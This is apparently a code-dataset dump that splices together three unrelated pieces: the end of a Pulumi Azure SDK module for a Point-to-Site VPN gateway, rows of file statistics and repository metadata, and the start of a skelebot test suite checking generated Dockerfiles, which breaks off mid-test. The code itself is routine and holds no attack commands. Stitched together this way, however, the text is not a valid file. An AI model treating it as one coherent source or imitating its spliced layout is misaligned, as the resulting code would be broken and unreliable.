pulumi.set(self, "virtual_hub_id", value)
@property
@pulumi.getter(name="vpnServerConfigurationId")
def vpn_server_configuration_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vpn_server_configuration_id")
@vpn_server_configuration_id.setter
def vpn_server_configuration_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpn_server_configuration_id", value)
class PointToPointVpnGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scale_unit: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_hub_id: Optional[pulumi.Input[str]] = None,
vpn_server_configuration_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Point-to-Site VPN Gateway.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_wan = azure.network.VirtualWan("exampleVirtualWan",
resource_group_name=example_resource_group.name,
location=example_resource_group.location)
example_virtual_hub = azure.network.VirtualHub("exampleVirtualHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
virtual_wan_id=example_virtual_wan.id,
address_prefix="10.0.0.0/23")
example_vpn_server_configuration = azure.network.VpnServerConfiguration("exampleVpnServerConfiguration",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
vpn_authentication_types=["Certificate"],
client_root_certificates=[azure.network.VpnServerConfigurationClientRootCertificateArgs(
name="DigiCert-Federated-ID-Root-CA",
public_cert_data=\"\"\"MIIDuzCCAqOgAwIBAgIQCHTZWCM+IlfFIRXIvyKSrjANBgkqhkiG9w0BAQsFADBn
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSYwJAYDVQQDEx1EaWdpQ2VydCBGZWRlcmF0ZWQgSUQg
Um9vdCBDQTAeFw0xMzAxMTUxMjAwMDBaFw0zMzAxMTUxMjAwMDBaMGcxCzAJBgNV
BAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdp
Y2VydC5jb20xJjAkBgNVBAMTHURpZ2lDZXJ0IEZlZGVyYXRlZCBJRCBSb290IENB
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvAEB4pcCqnNNOWE6Ur5j
QPUH+1y1F9KdHTRSza6k5iDlXq1kGS1qAkuKtw9JsiNRrjltmFnzMZRBbX8Tlfl8
zAhBmb6dDduDGED01kBsTkgywYPxXVTKec0WxYEEF0oMn4wSYNl0lt2eJAKHXjNf
GTwiibdP8CUR2ghSM2sUTI8Nt1Omfc4SMHhGhYD64uJMbX98THQ/4LMGuYegou+d
GTiahfHtjn7AboSEknwAMJHCh5RlYZZ6B1O4QbKJ+34Q0eKgnI3X6Vc9u0zf6DH8
Dk+4zQDYRRTqTnVO3VT8jzqDlCRuNtq6YvryOWN74/dq8LQhUnXHvFyrsdMaE1X2
DwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNV
HQ4EFgQUGRdkFnbGt1EWjKwbUne+5OaZvRYwHwYDVR0jBBgwFoAUGRdkFnbGt1EW
jKwbUne+5OaZvRYwDQYJKoZIhvcNAQELBQADggEBAHcqsHkrjpESqfuVTRiptJfP
9JbdtWqRTmOf6uJi2c8YVqI6XlKXsD8C1dUUaaHKLUJzvKiazibVuBwMIT84AyqR
QELn3e0BtgEymEygMU569b01ZPxoFSnNXc7qDZBDef8WfqAV/sxkTi8L9BkmFYfL
uGLOhRJOFprPdoDIUBB+tmCl3oDcBy3vnUeOEioz8zAkprcb3GHwHAK+vHmmfgcn
WsfMLH4JCLa/tRYL+Rw/N3ybCkDp00s0WUZ+AoDywSl0Q/ZEnNY0MsFiw6LyIdbq
M/s/1JRtO3bDSzD9TazRVzn2oBqzSa8VgIo5C1nOnoAKJTlsClJKvIhnRlaLQqk=
\"\"\",
)])
example_point_to_point_vpn_gateway = azure.network.PointToPointVpnGateway("examplePointToPointVpnGateway",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
virtual_hub_id=example_virtual_hub.id,
vpn_server_configuration_id=example_vpn_server_configuration.id,
scale_unit=1,
connection_configuration=azure.network.PointToPointVpnGatewayConnectionConfigurationArgs(
name="example-gateway-config",
vpn_client_address_pool=azure.network.PointToPointVpnGatewayConnectionConfigurationVpnClientAddressPoolArgs(
address_prefixes=["10.0.2.0/24"],
),
))
```
## Import
Point-to-Site VPN Gateway's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/pointToPointVpnGateway:PointToPointVpnGateway example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/p2svpnGateways/gateway1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']] connection_configuration: A `connection_configuration` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
:param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PointToPointVpnGatewayArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Point-to-Site VPN Gateway.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_wan = azure.network.VirtualWan("exampleVirtualWan",
resource_group_name=example_resource_group.name,
location=example_resource_group.location)
example_virtual_hub = azure.network.VirtualHub("exampleVirtualHub",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
virtual_wan_id=example_virtual_wan.id,
address_prefix="10.0.0.0/23")
example_vpn_server_configuration = azure.network.VpnServerConfiguration("exampleVpnServerConfiguration",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
vpn_authentication_types=["Certificate"],
client_root_certificates=[azure.network.VpnServerConfigurationClientRootCertificateArgs(
name="DigiCert-Federated-ID-Root-CA",
public_cert_data=\"\"\"MIIDuzCCAqOgAwIBAgIQCHTZWCM+IlfFIRXIvyKSrjANBgkqhkiG9w0BAQsFADBn
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSYwJAYDVQQDEx1EaWdpQ2VydCBGZWRlcmF0ZWQgSUQg
Um9vdCBDQTAeFw0xMzAxMTUxMjAwMDBaFw0zMzAxMTUxMjAwMDBaMGcxCzAJBgNV
BAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdp
Y2VydC5jb20xJjAkBgNVBAMTHURpZ2lDZXJ0IEZlZGVyYXRlZCBJRCBSb290IENB
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvAEB4pcCqnNNOWE6Ur5j
QPUH+1y1F9KdHTRSza6k5iDlXq1kGS1qAkuKtw9JsiNRrjltmFnzMZRBbX8Tlfl8
zAhBmb6dDduDGED01kBsTkgywYPxXVTKec0WxYEEF0oMn4wSYNl0lt2eJAKHXjNf
GTwiibdP8CUR2ghSM2sUTI8Nt1Omfc4SMHhGhYD64uJMbX98THQ/4LMGuYegou+d
GTiahfHtjn7AboSEknwAMJHCh5RlYZZ6B1O4QbKJ+34Q0eKgnI3X6Vc9u0zf6DH8
Dk+4zQDYRRTqTnVO3VT8jzqDlCRuNtq6YvryOWN74/dq8LQhUnXHvFyrsdMaE1X2
DwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBhjAdBgNV
HQ4EFgQUGRdkFnbGt1EWjKwbUne+5OaZvRYwHwYDVR0jBBgwFoAUGRdkFnbGt1EW
jKwbUne+5OaZvRYwDQYJKoZIhvcNAQELBQADggEBAHcqsHkrjpESqfuVTRiptJfP
9JbdtWqRTmOf6uJi2c8YVqI6XlKXsD8C1dUUaaHKLUJzvKiazibVuBwMIT84AyqR
QELn3e0BtgEymEygMU569b01ZPxoFSnNXc7qDZBDef8WfqAV/sxkTi8L9BkmFYfL
uGLOhRJOFprPdoDIUBB+tmCl3oDcBy3vnUeOEioz8zAkprcb3GHwHAK+vHmmfgcn
WsfMLH4JCLa/tRYL+Rw/N3ybCkDp00s0WUZ+AoDywSl0Q/ZEnNY0MsFiw6LyIdbq
M/s/1JRtO3bDSzD9TazRVzn2oBqzSa8VgIo5C1nOnoAKJTlsClJKvIhnRlaLQqk=
\"\"\",
)])
example_point_to_point_vpn_gateway = azure.network.PointToPointVpnGateway("examplePointToPointVpnGateway",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
virtual_hub_id=example_virtual_hub.id,
vpn_server_configuration_id=example_vpn_server_configuration.id,
scale_unit=1,
connection_configuration=azure.network.PointToPointVpnGatewayConnectionConfigurationArgs(
name="example-gateway-config",
vpn_client_address_pool=azure.network.PointToPointVpnGatewayConnectionConfigurationVpnClientAddressPoolArgs(
address_prefixes=["10.0.2.0/24"],
),
))
```
## Import
Point-to-Site VPN Gateway's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/pointToPointVpnGateway:PointToPointVpnGateway example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Network/p2svpnGateways/gateway1
```
:param str resource_name: The name of the resource.
:param PointToPointVpnGatewayArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PointToPointVpnGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scale_unit: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_hub_id: Optional[pulumi.Input[str]] = None,
vpn_server_configuration_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PointToPointVpnGatewayArgs.__new__(PointToPointVpnGatewayArgs)
if connection_configuration is None and not opts.urn:
raise TypeError("Missing required property 'connection_configuration'")
__props__.__dict__["connection_configuration"] = connection_configuration
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if scale_unit is None and not opts.urn:
raise TypeError("Missing required property 'scale_unit'")
__props__.__dict__["scale_unit"] = scale_unit
__props__.__dict__["tags"] = tags
if virtual_hub_id is None and not opts.urn:
raise TypeError("Missing required property 'virtual_hub_id'")
__props__.__dict__["virtual_hub_id"] = virtual_hub_id
if vpn_server_configuration_id is None and not opts.urn:
raise TypeError("Missing required property 'vpn_server_configuration_id'")
__props__.__dict__["vpn_server_configuration_id"] = vpn_server_configuration_id
super(PointToPointVpnGateway, __self__).__init__(
'azure:network/pointToPointVpnGateway:PointToPointVpnGateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
connection_configuration: Optional[pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scale_unit: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_hub_id: Optional[pulumi.Input[str]] = None,
vpn_server_configuration_id: Optional[pulumi.Input[str]] = None) -> 'PointToPointVpnGateway':
"""
Get an existing PointToPointVpnGateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PointToPointVpnGatewayConnectionConfigurationArgs']] connection_configuration: A `connection_configuration` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
:param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PointToPointVpnGatewayState.__new__(_PointToPointVpnGatewayState)
__props__.__dict__["connection_configuration"] = connection_configuration
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scale_unit"] = scale_unit
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_hub_id"] = virtual_hub_id
__props__.__dict__["vpn_server_configuration_id"] = vpn_server_configuration_id
return PointToPointVpnGateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="connectionConfiguration")
def connection_configuration(self) -> pulumi.Output['outputs.PointToPointVpnGatewayConnectionConfiguration']:
"""
A `connection_configuration` block as defined below.
"""
return pulumi.get(self, "connection_configuration")
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "dns_servers")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="scaleUnit")
def scale_unit(self) -> pulumi.Output[int]:
"""
The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "scale_unit")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="virtualHubId")
def virtual_hub_id(self) -> pulumi.Output[str]:
"""
The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_hub_id")
@property
@pulumi.getter(name="vpnServerConfigurationId")
def vpn_server_configuration_id(self) -> pulumi.Output[str]:
"""
The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vpn_server_configuration_id")
| 53.771558
| 218
| 0.698619
| 4,007
| 35,543
| 5.992264
| 0.06863
| 0.067344
| 0.054225
| 0.030903
| 0.908542
| 0.897714
| 0.891675
| 0.875682
| 0.871892
| 0.859148
| 0
| 0.013098
| 0.211659
| 35,543
| 660
| 219
| 53.85303
| 0.843826
| 0.45919
| 0
| 0.710769
| 1
| 0
| 0.139112
| 0.075673
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0.003077
| 0.021538
| 0
| 0.276923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2185436beeb9585edda4cc6749d585f366f2dcd7
| 22,450
|
py
|
Python
|
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
test/test_systems_generators_dockerfile.py
|
dmyers87/skelebot
|
954552fc5f465eb2a887f5c96a27f11ad423cd71
|
[
"MIT"
] | null | null | null |
import os
import unittest
from unittest import mock
import skelebot as sb
# Test plugin that says 'Duuuuuude' at the end of every command
class SayDude(sb.objects.component.Component):
activation = sb.objects.component.Activation.ALWAYS
def appendCommand(self, job, native):
return "echo Duuuuuude"
class TestDockerfile(unittest.TestCase):
path = ""
# Get the path to the current working directory before we mock the function to do so
def setUp(self):
self.path = os.getcwd()
self.maxDiff = None
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_no_language(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = None
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM ubuntu:18.04
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "R"
config.dependencies.append("github:github.com/repo:cool-lib")
config.dependencies.append("file:libs/proj:cool-proj")
config.dependencies.append("dtable=9.0")
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/r-base
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["Rscript", "-e", "install.packages('pyyaml', repo='https://cloud.r-project.org'); library(pyyaml)"]
RUN ["Rscript", "-e", "install.packages('artifactory', repo='https://cloud.r-project.org'); library(artifactory)"]
RUN ["Rscript", "-e", "install.packages('argparse', repo='https://cloud.r-project.org'); library(argparse)"]
RUN ["Rscript", "-e", "install.packages('coverage', repo='https://cloud.r-project.org'); library(coverage)"]
RUN ["Rscript", "-e", "install.packages('pytest', repo='https://cloud.r-project.org'); library(pytest)"]
RUN ["Rscript", "-e", "library(devtools); install_github('github.com/repo'); library(cool-lib)"]
COPY libs/proj libs/proj
RUN ["Rscript", "-e", "install.packages('/app/libs/proj', repos=NULL, type='source'); library(cool-proj)"]
RUN ["Rscript", "-e", "library(devtools); install_version('dtable', version='9.0', repos='http://cran.us.r-project.org'); library(dtable)"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_entrypoint_exec(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.primaryExe = "ENTRYPOINT"
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
ENTRYPOINT [\"bash\", \"build.sh\"]\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_entrypoint_path(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.primaryExe = "ENTRYPOINT"
config.primaryJob = "test-entrypoint-path"
job = sb.objects.job.Job(name="test-entrypoint-path", source="jobs/dummy.py")
config.jobs.append(job)
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
ENTRYPOINT ["python", "-u", "jobs/dummy.py"]\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_cmd_path(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.primaryExe = "CMD"
config.primaryJob = "test-cmd-path"
job = sb.objects.job.Job(name="test-cmd-path", source="jobs/dummy.py")
config.jobs.append(job)
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c "python -u jobs/dummy.py --log info"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base_py(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "Python"
config.dependencies.append("github:github.com/repo")
config.dependencies.append("github:https://github.com/securerepo")
config.dependencies.append("file:libs/proj")
config.dependencies.append("dtable=9.0")
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
RUN ["pip", "install", "git+github.com/repo"]
RUN ["pip", "install", "git+https://github.com/securerepo"]
COPY libs/proj libs/proj
RUN ["pip", "install", "/app/libs/proj"]
RUN ["pip", "install", "dtable==9.0"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_base_py_versions(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "Python"
config.dependencies.append("dtable=9.0")
config.dependencies.append("pandas==0.25")
config.dependencies.append("numpy~=1.17")
config.dependencies.append("requests>= 2.2, == 2.*")
config.dependencies.append("scipy!= 1.3.*")
expectedDockerfile = """
# This Dockerfile was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
FROM skelebot/python-base:3.6
MAINTAINER Mega Man <megaman@cars.com>
WORKDIR /app
RUN ["pip", "install", "pyyaml"]
RUN ["pip", "install", "artifactory"]
RUN ["pip", "install", "argparse"]
RUN ["pip", "install", "coverage"]
RUN ["pip", "install", "pytest"]
RUN ["pip", "install", "dtable==9.0"]
RUN ["pip", "install", "pandas==0.25"]
RUN ["pip", "install", "numpy~=1.17"]
RUN ["pip", "install", "requests>= 2.2, == 2.*"]
RUN ["pip", "install", "scipy!= 1.3.*"]
COPY . /app
RUN rm -rf build/
RUN rm -rf dist/
CMD /bin/bash -c \"bash build.sh --env local --log info\"\n"""
sb.systems.generators.dockerfile.buildDockerfile(config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expectedDockerfile)
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerfile_krb(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/Dockerfile".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
config = sb.systems.generators.yaml.loadConfig()
config.language = "R"
config.dependencies.append("github:github.com/repo:cool-lib")
config.dependencies.append("file:libs/proj:cool-proj")
